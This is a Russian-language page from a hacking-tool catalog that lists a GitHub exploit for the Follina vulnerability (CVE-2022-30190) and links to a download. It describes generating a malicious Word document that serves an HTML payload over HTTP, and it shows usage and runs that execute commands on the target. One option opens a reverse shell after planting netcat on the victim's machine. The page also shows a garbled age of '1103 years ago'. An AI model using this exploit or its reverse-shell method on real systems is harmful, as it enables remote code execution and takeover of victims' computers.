Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
FOLLINA-CVE-2022-30190 — Реализация FOLLINA-CVE-2022-30190 | Kitploit
Инструменты/GitHubGitHub/toxicenvelope/follina-cve-2022-30190
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubtoxicenvelope/follina-cve-2022-30190

FOLLINA-CVE-2022-30190

Реализация FOLLINA-CVE-2022-30190

Репозиторий
1103 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

FOLLINA-CVE-2022-30190

Реализация FOLLINA-CVE-2022-30190


Этот репозиторий содержит инструмент эксплуатации для уязвимости FOLLINA-CVE-2022-30190

Отказ от ответственности

Этот инструмент разработан для целей тестирования безопасности и исследований. Клонируя / форкая этот инструмент, исходный разработчик снимает с себя любую ответственность за действия пользователей.


Предварительные требования

  1. прочитайте о CVE-2022-30190 здесь
  2. подготовьте тестовую среду (рекомендую использовать Virtual Box + Vagrant)
  • Скачайте VirtualBox здесь
  • Скачайте Vagrant здесь
  • Прочитайте о Vagrant CLI здесь

Создайте атаку "Follina" MS-MSDT с помощью вредоносного документа Microsoft Word и разместите пейлоад на HTTP-сервере.

Использование

usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT 
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT           
                        port to serve the HTTP server (default: 8000)

Примеры

Запустить calc.exe:

$ python3 exploit.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000

Запустить cmd.exe:

$ python3 exploit.py --command "cmd"

Получите reverse shell на порту 9001. Обратите внимание: этот метод загружает бинарный файл netcat на машину жертвы и помещает его в C:\Windows\Tasks. Он не удаляет этот бинарный файл. Это вызовет срабатывание антивируса, если AV не отключён.

$ python3 exploit.py --reverse 9001
Скачать инструмент